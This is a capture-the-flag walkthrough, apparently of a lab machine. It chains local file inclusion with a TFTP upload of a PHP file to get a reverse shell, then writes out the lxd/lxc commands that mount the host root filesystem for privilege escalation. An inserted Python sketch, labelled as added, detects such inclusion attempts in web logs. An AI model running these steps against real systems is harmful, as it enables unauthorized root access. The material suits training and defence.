After browsing to the HTTP site, the user is redirected to:

So I decided to try /etc/passwd

The host is vulnerable to local file inclusion (LFI).

There are users related to the TFTP service and the web server. Meanwhile, I finished a quick scan of UDP ports:

Script scan of TFTP:

I decided to enumerate host files via LFI. It is an Apache web server, so I tried to find some files inside /var/www/html

It looks like credentials for the mike account. SSH is disabled on the host. TFTP doesn’t require a username and password. After 5 minutes I figured out that if it is a PHP server, I can execute LFI, and the TFTP port is open, then I can send a malicious PHP file and execute it. I need to know the destination location of a file uploaded by TFTP.

The default directory of TFTP is:

/var/lib/tftpboot/
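Seen from the defender's side, this chain leaves a clear trace in the web server's access log: an include parameter that carries an absolute path, a traversal sequence, or a path under the TFTP directory. The following detection sketch is an added example, not part of the original write-up; the `file` parameter name, the addresses and the log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TFTP_ROOT = "/var/lib/tftpboot/"  # TFTP default directory named in the write-up
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines in Apache log style; the "file" parameter,
# addresses and file names are assumptions made for this example.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?file=home.php HTTP/1.1" 200 3704',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?file=/etc/passwd HTTP/1.1" 200 1575',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1575',
    '10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2024:10:03:40 +0000] "GET /?file=/var/lib/tftpboot/upload.php HTTP/1.1" 200 0',
]


def classify(value):
    """Return why a parameter value looks like file inclusion, or None."""
    decoded = unquote(value)  # second decode catches double-encoded input
    if TFTP_ROOT in decoded:
        return "include from TFTP upload directory"
    if ".." in decoded.replace("\\", "/").split("/"):
        return "path traversal"
    if decoded.startswith("/"):
        return "absolute path"
    return None


def scan(lines):
    """Return (ip, status, parameter, decoded value, reason) per suspicious request."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        query = urlsplit(match["target"]).query
        # parse_qsl percent-decodes once, so %2e%2e%2f arrives here as ../
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify(value)
            if reason:
                findings.append((match["ip"], int(match["status"]), name, unquote(value), reason))
    return findings


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The absolute-path rule also matches benign parameters such as a post-login redirect path, so in practice it should be scoped to the endpoints that actually include files.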

I got the reverse shell:

Mike’s credentials worked

Enumeration of Mike’s account

As in previous boxes, it is probably not the intended way, so I omit this in priv esc.
The lxd group looks interesting – https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

This is a VM without internet connection, so I need to prepare files on my machine.

One method is described on hacktricks:

https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

The 2nd method is much faster at building the image:

https://www.hackingarticles.in/lxd-privilege-escalation/

On my host:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Send the file to the victim:

On the victim:

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

The filesystem is mounted at /mnt/root, so the root directory is located at /mnt/root/root

By Marceli
